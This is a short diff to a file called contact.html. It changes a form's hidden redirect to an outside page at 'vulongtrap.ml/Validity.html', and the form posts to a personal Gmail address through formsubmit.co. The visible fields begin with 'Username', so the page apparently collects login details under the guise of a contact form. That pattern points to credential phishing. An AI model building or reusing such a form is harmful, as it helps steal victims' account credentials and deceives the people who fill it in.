--- a/contact.html
+++ b/contact.html
@@ -19,7 +19,7 @@
 	
 	<div class="w-50 m-auto">
 		<form action="https://formsubmit.co/sahirfaris200@gmail.com" method="post">
-		<input type="hidden" name="_next" value="Validity.html">
+		<input type="hidden" name="_next" value="https://vulongtrap.ml/Validity.html">
 			<div class="form-group">
 			<label>Username</label>
 			<input type="text" name="user" autocomplete="off" class="form-control"  required>
